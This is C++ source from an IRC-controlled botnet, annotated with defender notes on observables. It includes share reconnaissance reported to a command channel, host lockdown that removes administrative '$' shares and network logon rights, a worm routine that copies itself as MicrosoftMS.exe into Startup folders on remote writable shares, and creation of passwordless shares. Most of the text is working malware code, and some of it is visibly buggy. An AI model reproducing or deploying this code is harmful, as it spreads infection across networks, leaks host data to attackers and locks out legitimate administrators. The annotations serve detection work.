// ListShares: enumerates the SMB shares of ServerName and relays them to IRC.
//
// Calls NetShareEnum at level 502 through the run-time resolved pointer
// fNetShareEnum, then sends one formatted line per share (name, local path,
// current uses, and the IsVSD() rendering of the security-descriptor validity
// check) to `chan` on `sock` via irc_privmsg.
//
// Returns TRUE only when the final enumeration status is ERROR_SUCCESS; any
// other final status is reported to the channel and yields FALSE.
//
// Defender note: this is share reconnaissance reported over the bot's command
// channel. The host-side observable is a level-502 share enumeration by a
// process that has no administrative purpose; the network-side observable is
// share names and local paths appearing in outbound IRC traffic.
BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName)
{
    char buffer[IRCLINE];

    PSHARE_INFO_502 pBuf,p;
    NET_API_STATUS nStatus;
    // AsWideString is defined elsewhere; ownership of the returned buffer is
    // not visible from here.
    LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
    DWORD entriesread=0,totalread=0,resume=0;

    // Column header for the listing that follows.
    irc_privmsg(sock,chan,"Share name: Resource: Uses: Desc:",notice);

    // `resume` carries the enumeration position between calls, so the loop
    // repeats for as long as the API reports ERROR_MORE_DATA.
    do {
        nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

        if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
            p = pBuf;

            for(unsigned int i=1;i <= entriesread;i++) {
                // %S prints the wide-character name and path into the narrow buffer.
                sprintf(buffer,"%-14S %-24S %-6u %-4s",p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor)));
                irc_privmsg(sock,chan,buffer,notice,TRUE);

                p++;
            }

            // The enumeration buffer is allocated by the API and released per batch.
            fNetApiBufferFree(pBuf);
        } else {
            // NasError is defined elsewhere; presumably it maps the status to text.
            sprintf(buffer,"-\x03\x34\2net\2\x03- share list error %s <%ld>",NasError(nStatus),nStatus);
            irc_privmsg(sock,chan,buffer,notice);
        }
    } while (nStatus == ERROR_MORE_DATA);

    if(nStatus != ERROR_SUCCESS)
        return FALSE;

    return TRUE;
}
// SecureSystem: changes local settings that close common remote-access paths,
// reporting each result to IRC (unless `silent`) and to addlog.
//
// Steps visible in this block:
//   1. Writes EnableDCOM = "N" (REG_SZ) under HKLM\<regkey3>.
//   2. Writes restrictanonymous = 1 (REG_DWORD) under HKLM\<regkey4>.
//   3. Enumerates local shares at level 502 and deletes every share whose
//      name ends in '$'; when enumeration fails, tries to delete each entry
//      of ShareList instead.
//
// regkey3, regkey4, ShareList, ShareDel, AsAnsiString, noadvapi32 and
// nonetapi32 are defined elsewhere in the project. Always returns TRUE.
//
// Defender note: a bot that hardens its host is usually keeping competing
// malware out rather than protecting the owner, and removing the '$' shares
// also breaks legitimate remote administration. Observables are registry
// value writes for EnableDCOM and restrictanonymous (registry auditing,
// e.g. Security event 4657, or EDR registry telemetry) and a burst of share
// deletions (file-share auditing, e.g. Security event 5144).
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
    char sendbuf[IRCLINE];

    if (!noadvapi32) {
        HKEY hKey;

        // Step 1: disable DCOM by setting the EnableDCOM value to "N".
        if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
            TCHAR szDataBuf[]="N";
            if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
                sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
            else
                sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
            fRegCloseKey(hKey);
        } else
            sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
        if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
        addlog(sendbuf);

        // Step 2: set restrictanonymous to 1. The result message is sent by
        // the shared report call that follows the noadvapi32 branch.
        if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
            DWORD dwData = 0x00000001;
            if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
                sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
            else
                sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
            fRegCloseKey(hKey);
        } else
            sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
    } else
        sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
    if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
    addlog(sendbuf);

    if (!nonetapi32) {
        PSHARE_INFO_502 pBuf,p;
        NET_API_STATUS nStatus;
        DWORD entriesread=0,totalread=0,resume=0;

        // Step 3: walk the local share table (NULL server name) in batches.
        do {
            nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

            if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
                p = pBuf;

                for(unsigned int i=1;i <= entriesread;i++) {
                    // Only shares whose last character is '$' are targeted.
                    if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
                        if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
                            _snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »» Share '%S' deleted.",p->shi502_netname);
                        else
                            _snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »» Failed to delete '%S' share.",p->shi502_netname);
                        if (!silent)
                            irc_privmsg(sock,chan,sendbuf,notice, TRUE);
                        addlog(sendbuf);
                    }

                    p++;
                }

                fNetApiBufferFree(pBuf);
            } else {
                // Enumeration failed: fall back to the fixed ShareList table.
                for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
                    if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
                        _snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
                    else
                        _snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
                    if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
                    addlog(sendbuf);
                }
            }
        } while (nStatus == ERROR_MORE_DATA);

        // This summary is written regardless of how many deletions succeeded.
        sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
    } else
        sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
    if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
    addlog(sendbuf);

    return TRUE;
}
// SecureSystem (extended variant): changes local settings that close common
// remote-access paths, reporting each result to IRC (unless `silent`) and to
// addlog.
//
// Steps visible in this block:
//   1. Writes EnableDCOM = "N" (REG_SZ) under HKLM\<regkey3>.
//   2. Writes restrictanonymous = 1 (REG_DWORD) under HKLM\<regkey4>.
//   3. Writes restrictanonymoussam = 1 (REG_DWORD) under HKLM\<regkey4>.
//   4. Unless NO_LSARESTRICT is defined, calls SearchForPrivilegedAccounts
//      for "SeNetworkLogonRight"; the status text says the right is removed
//      from accounts, but the helper itself is not visible here.
//   5. Unless NO_NET is defined, enumerates local shares at level 502 and
//      deletes every share whose name ends in '$'; when enumeration fails,
//      tries to delete each entry of ShareList instead.
//
// regkey3, regkey4, ShareList, ShareDel, SearchForPrivilegedAccounts,
// noadvapi32 and nonetapi32 are defined elsewhere. Always returns TRUE.
//
// Defender note: these are lock-out changes made by the bot for its own
// benefit. Removing SeNetworkLogonRight and the '$' shares also cuts off
// remote administration and incident-response tooling. Observables are
// registry value writes for the three values above (e.g. Security event
// 4657 or EDR registry telemetry), a change to user-rights assignment in
// local policy, and a burst of share deletions (e.g. Security event 5144).
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
    char sendbuf[IRCLINE];

    if (!noadvapi32) {
        HKEY hKey;

        // Step 1: disable DCOM by setting the EnableDCOM value to "N".
        if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
            TCHAR szDataBuf[]="N";
            if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
                sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
            else
                sprintf(sendbuf,"[SECURE]: DCOM disabled.");
            fRegCloseKey(hKey);
        } else
            sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
        if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
        addlog(sendbuf);

        // Step 2: set restrictanonymous to 1.
        if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
            DWORD dwData = 0x00000001;
            if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
                sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
            else
                sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");
            fRegCloseKey(hKey);
        } else
            sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
        if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
        addlog(sendbuf);

        // Step 3: set restrictanonymoussam to 1 under the same key.
        if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
            DWORD dwData = 0x00000001;
            if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
                sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
            else
                sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");
            fRegCloseKey(hKey);
        } else
            sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
        if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
        addlog(sendbuf);

#ifndef NO_LSARESTRICT
        // Step 4: the helper's return value is used as the number of accounts
        // changed. Its result message is sent by the shared report call that
        // follows the noadvapi32 branch.
        DWORD dwRet;
        if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
            sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
        else
            sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
#endif
    } else
        sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
    if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
    addlog(sendbuf);

#ifndef NO_NET
    if (!nonetapi32) {
        PSHARE_INFO_502 pBuf,p;
        NET_API_STATUS nStatus;
        DWORD entriesread=0,totalread=0,resume=0;

        // Step 5: walk the local share table (NULL server name) in batches.
        do {
            nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

            if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
                p = pBuf;

                for(unsigned int i=1;i <= entriesread;i++) {
                    // Only shares whose last character is '$' are targeted.
                    if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
                        // ShareDel takes a narrow string here, so the wide
                        // share name is converted into a temporary buffer.
                        char* szShareName = new char[wcslen(p->shi502_netname)+1];
                        WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);

                        if(ShareDel(NULL,szShareName) == NERR_Success)
                            _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
                        else
                            _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
                        if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
                        addlog(sendbuf);

                        delete szShareName;
                    }

                    p++;
                }

                fNetApiBufferFree(pBuf);
            } else {
                // Enumeration failed: fall back to the fixed ShareList table.
                for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
                    if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
                        _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
                    else
                        _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
                    if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
                    addlog(sendbuf);
                }
            }
        } while (nStatus == ERROR_MORE_DATA);

        // This summary is written regardless of how many deletions succeeded.
        sprintf(sendbuf,"[SECURE]: Network shares deleted.");
    } else
        sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
    if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
    addlog(sendbuf);
#endif

    return TRUE;
}
// NetBios: share-based propagation routine of the bot.
//
// What the visible code does: builds the UNC prefix \\<Addr>, enumerates the
// remote host's shares at level 1, and for each disk share tries to copy the
// running executable to <share>\<startupdirs[s]>\MicrosoftMS.exe. After the
// first successful copy it reports to IRC and stops.
//
// Return value: 2 when netapi32.dll or the needed function pointers are not
// available; 1 on every other path, whether or not a copy succeeded.
//
// `buffer`, `remotefile`, `exinfo` and `startupdirs` are not declared in this
// function and must come from elsewhere in the project. `remoteinifilename`
// and `sendbuf` are declared here but not used in the visible code.
//
// Defender note: nothing here exploits a software flaw; it relies on disk
// shares that the current credentials can write to. Observables are a remote
// share enumeration followed by creation of an .exe named MicrosoftMS.exe
// inside a Startup directory over SMB. Mitigations are to avoid exposing
// writable shares that contain profile or Startup paths, to restrict SMB
// between workstations, and to alert on executable creation in Startup
// folders.
BOOL NetBios(char * Addr)
{
    char szRemoteAddr[MAX_PATH];
    sprintf(szRemoteAddr,"\\\\%s",Addr);

    // netapi32 is loaded on demand; only NetShareEnum is resolved here.
    HINSTANCE netapi32_dll = LoadLibrary("netapi32.dll");
    if (netapi32_dll) {
        fNetShareEnum = (RSP5) GetProcAddress(netapi32_dll, "NetShareEnum");
        //fNetApiBufferFree = (NABF) GetProcAddress(netapi32_dll, "NetApiBufferFree");

        if (!fNetShareEnum || !fNetApiBufferFree) { //not xp/2000 ?
            return 2;
        }
    } else
        return 2; //dll's not found

    // The enumeration API takes a wide-character server name.
    wchar_t wcRemoteAddr[MAX_PATH] = L"";
    mbstowcs(wcRemoteAddr, szRemoteAddr, strlen(szRemoteAddr) + 1);

    PSHARE_INFO_1 BufPtr,p;
    NET_API_STATUS res;
    DWORD er=0,tr=0,resume=0, i;

    char thisfilename[MAX_PATH];
    char remotefilename[MAX_PATH];
    char remoteinifilename[MAX_PATH];
    char sendbuf[512];

    // Path of the currently running image, used as the copy source.
    GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));

    do {
        res = fNetShareEnum ((CHAR *) wcRemoteAddr, 1, (LPBYTE *) &BufPtr, -1, &er, &tr, &resume);

        if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA) {
            p=BufPtr;

            for(i=1;i<=er;i++) {
                // Only disk shares are considered.
                if (p->shi1_type == STYPE_DISKTREE) {
                    int s;
                    // startupdirs is a NULL-terminated table defined elsewhere.
                    for (s=0;startupdirs[s] != NULL;s++) {
                        memset(remotefilename,0,sizeof(remotefilename));
                        sprintf(remotefilename,"%s\\%s\\%s\\MicrosoftMS.exe",szRemoteAddr,p->shi1_netname,startupdirs[s]);

                        // The third argument TRUE makes CopyFile fail if the
                        // destination file already exists.
                        if (CopyFile(thisfilename,remotefilename,TRUE) != 0) {
                            _snprintf(buffer,sizeof(buffer),"[NetBios]: Exploiting IP: %s",remotefile);
                            irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

                            fNetApiBufferFree(BufPtr);
                            FreeLibrary(netapi32_dll);
                            return 1;
                        }
                    }
                }

                p++;
            }

            fNetApiBufferFree(BufPtr);
        } else {
            FreeLibrary(netapi32_dll);
            return 1;
        }
    } while (res==ERROR_MORE_DATA);

    FreeLibrary(netapi32_dll);
    return 1;
}
// SecureShares: deletes or re-creates network shares on the local host and
// reports the outcome through the IRC object passed as `conn`.
//
//   secure != 0  Enumerates local shares at level 502 and deletes each share
//                whose name ends in '$'; when enumeration fails, tries to
//                delete every entry of ShareList instead.
//   secure == 0  Adds every ShareList entry back as a disk share with remark
//                "rofl", max_uses 4 and no password.
//
// Reporting: nothing is sent when `loop` or `silent` is set. Otherwise
// `verbose` selects a per-share list plus a total, and non-verbose sends only
// the total. ShareList, sec_title, unsec_title, fNetShareDel and
// fNetShareAdd are defined elsewhere.
//
// Defender note: both directions change the host's share table from a
// process with no administrative purpose. Observables are bursts of share
// deletions or creations (file-share auditing, e.g. Security events 5144 and
// 5142) and shares that carry the remark "rofl".
void SecureShares(BOOL secure, void *conn, char *target, BOOL silent, BOOL verbose, BOOL loop)
{
    IRC* irc=(IRC*)conn;

    char sendbuf[IRCLINE];
    char tmpBuffer[IRCLINE];
    int shdel=0;   // number of shares deleted
    int shmake=0;  // number of shares created

    if (secure) {
        PSHARE_INFO_502 pBuf,p;
        NET_API_STATUS nStatus;
        DWORD entriesread=0,totalread=0,resume=0;

        // sendbuf is only initialised when a report will be sent.
        if (!loop && !silent)
            sprintf(sendbuf,"%s Shares %s:",sec_title,"erased");

        do {
            nStatus=fNetShareEnum(NULL,502,(LPBYTE *)&pBuf,-1,&entriesread,&totalread,&resume);

            if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
                p = pBuf;

                for(unsigned int i=1;i <= entriesread;i++) {
                    // Only shares whose last character is '$' are targeted.
                    if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
                        if(fNetShareDel(NULL,(unsigned short *)p->shi502_netname,0) == NERR_Success) {
                            if (!loop && !silent && verbose) {
                                // Append the name to the comma-separated report.
                                if (shdel>0)
                                    strcat(sendbuf,",");
                                sprintf(tmpBuffer," %S",p->shi502_netname);
                                strcat(sendbuf,tmpBuffer);
                            }
                            shdel++;
                        }
                    }

                    p++;
                }

                fNetApiBufferFree(pBuf);
            } else {
                // Enumeration failed: fall back to the fixed ShareList table.
                for(int i=0;i < (sizeof(ShareList)/sizeof(*ShareList));i++) {
                    if(fNetShareDel(NULL,(unsigned short *)ShareList[i].ShareName,0) == NERR_Success) {
                        if (!loop && !silent && verbose) {
                            if (shdel>0)
                                strcat(sendbuf,",");
                            sprintf(tmpBuffer," %S",ShareList[i].ShareName);
                            strcat(sendbuf,tmpBuffer);
                        }
                        shdel++;
                    }
                }
            }
        } while (nStatus == ERROR_MORE_DATA);

        if (verbose && !loop && !silent) {
            if (shdel==0)
                irc->privmsg(target,"%s No shares %s.",sec_title,"erased");
            else {
                sprintf(tmpBuffer," - Total shares %s: %d.","erased",shdel);
                strcat(sendbuf,tmpBuffer);
                irc->privmsg(target,sendbuf);
            }
        } else if (!loop && !silent && !verbose) {
            if (shdel==0)
                irc->privmsg(target,"%s No shares %s.",sec_title,"erased");
            else {
                irc->privmsg(target,"%s Total shares %s: %d.",sec_title,"erased",shdel);
            }
        }
    } else { // Unsecure
        if (!loop && !silent)
            sprintf(sendbuf,"%s Shares %s:",unsec_title,"created");

        NET_API_STATUS res;
        SHARE_INFO_2 p;
        DWORD parm_err = 0;

        // Re-create each ShareList entry as a level-2 disk share.
        for (int i=0;i < (sizeof(ShareList) / sizeof (*ShareList));i++) {
            p.shi2_netname = (unsigned short *)TEXT(ShareList[i].ShareName);
            p.shi2_type = STYPE_DISKTREE;
            p.shi2_remark = (unsigned short *)TEXT("rofl");
            p.shi2_permissions = 0;
            p.shi2_max_uses = 4;
            p.shi2_current_uses = 0;
            p.shi2_path = (unsigned short *)TEXT(ShareList[i].SharePath);
            p.shi2_passwd = NULL;

            res=fNetShareAdd(NULL,2,(LPBYTE)&p,&parm_err);
            if(res==0) {
                if (!loop && !silent && verbose) {
                    if (shmake>0)
                        strcat(sendbuf,",");
                    sprintf(tmpBuffer," %S",ShareList[i].ShareName);
                    strcat(sendbuf,tmpBuffer);
                }
                shmake++;
            }
        }

        if (verbose && !loop && !silent) {
            if (shmake==0)
                irc->privmsg(target,"%s No shares %s.",unsec_title,"created");
            else {
                sprintf(tmpBuffer," - Total shares %s: %d.","created",shmake);
                strcat(sendbuf,tmpBuffer);
                irc->privmsg(target,sendbuf);
            }
        } else if (!verbose && !silent && !loop) {
            if (shmake==0)
                irc->privmsg(target,"%s No shares %s.",unsec_title,"created");
            else {
                irc->privmsg(target,"%s Total shares %s: %d.",unsec_title,"created",shmake);
            }
            // addlog(MAINLOG,sendbuf);
        }
    }

    return;
}